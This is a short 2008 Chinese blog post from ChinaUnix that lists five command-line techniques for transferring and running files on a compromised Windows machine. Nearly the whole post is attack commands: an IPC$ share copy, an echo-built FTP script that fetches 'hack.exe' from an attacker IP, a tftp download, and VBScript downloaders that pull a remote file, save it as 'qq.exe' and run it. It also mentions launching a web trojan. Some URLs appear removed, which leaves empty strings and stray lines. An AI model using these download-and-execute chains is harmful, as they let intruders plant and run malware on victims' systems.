Chinaunix首页 | 论坛 | 博客
  • 博客访问: 1163582
  • 博文数量: 271
  • 博客积分: 6445
  • 博客等级: 准将
  • 技术积分: 2823
  • 用 户 组: 普通用户
  • 注册时间: 2006-03-04 23:22
文章分类

全部博文(271)

文章存档

2023年(5)

2022年(3)

2021年(18)

2020年(9)

2019年(1)

2018年(13)

2017年(11)

2015年(9)

2013年(2)

2012年(4)

2011年(24)

2010年(114)

2009年(6)

2008年(29)

2007年(13)

2006年(10)

我的朋友

分类: WINDOWS

2008-05-31 14:25:41

方法一:利用IPC$共享传送方式


net use \IP\共享目录(后面要大$) "密码" /user:"用户名"

copy c:\file \IP\共享目录


方法二:FTP方式

echo open xxx.xxx.xxx.xxx>c:\hack.txt
echo user>>c:\hack.txt
echo pass>>c:\hack.txt
echo get hack.exe>>c:\hack.txt
echo bye>>c:\hack.txt
ftp -s:c:\hack.txt
del c:\hack.txt

方法三:tftp方式

条件:首先你得拥有一个公网IP,把你要传送的文件与tftp放在同一目录.

命令格式: tftp -i 你的IP get xx.exe


方法四:脚本法

方法(1):

echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"qq.exe^",2 >sysinfo.

方法(2):

echo Set xPost = CreateObject("Microsoft.XMLHTTP") >sysinfo.
echo xPost.Open "GET","",0 >>sysinfo.
echo xPost.Send() >>sysinfo.
echo Set sGet = CreateObject("ADODB.Stream") >>sysinfo.
echo sGet.Mode = 3 >>sysinfo.
echo sGet.Type = 1 >>sysinfo.
echo sGet.Open() >>sysinfo.
echo sGet.Write(xPost.responseBody) >>sysinfo.
echo sGet.SaveToFile "qq.exe",2 >>sysinfo.

然后执行 cscript sysinfo.就可以了.

方法(3):

type %systemdrive%\\boot.ini 查看版本


echo with wscript:if .arguments.count^<2 then .quit:end if >dl.vbe
echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>dl.vbe
echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then quit >>dl.vbe
echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbe
cscript dl.vbe
qq.exe
qq.exe
qq.exe

其中: 改成你文件的网站路径.
hack.exe可以改成保存文件的路径.

方法五:命令行下执行网页木马

start

其中为你的网页木马地址.
阅读(1611) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~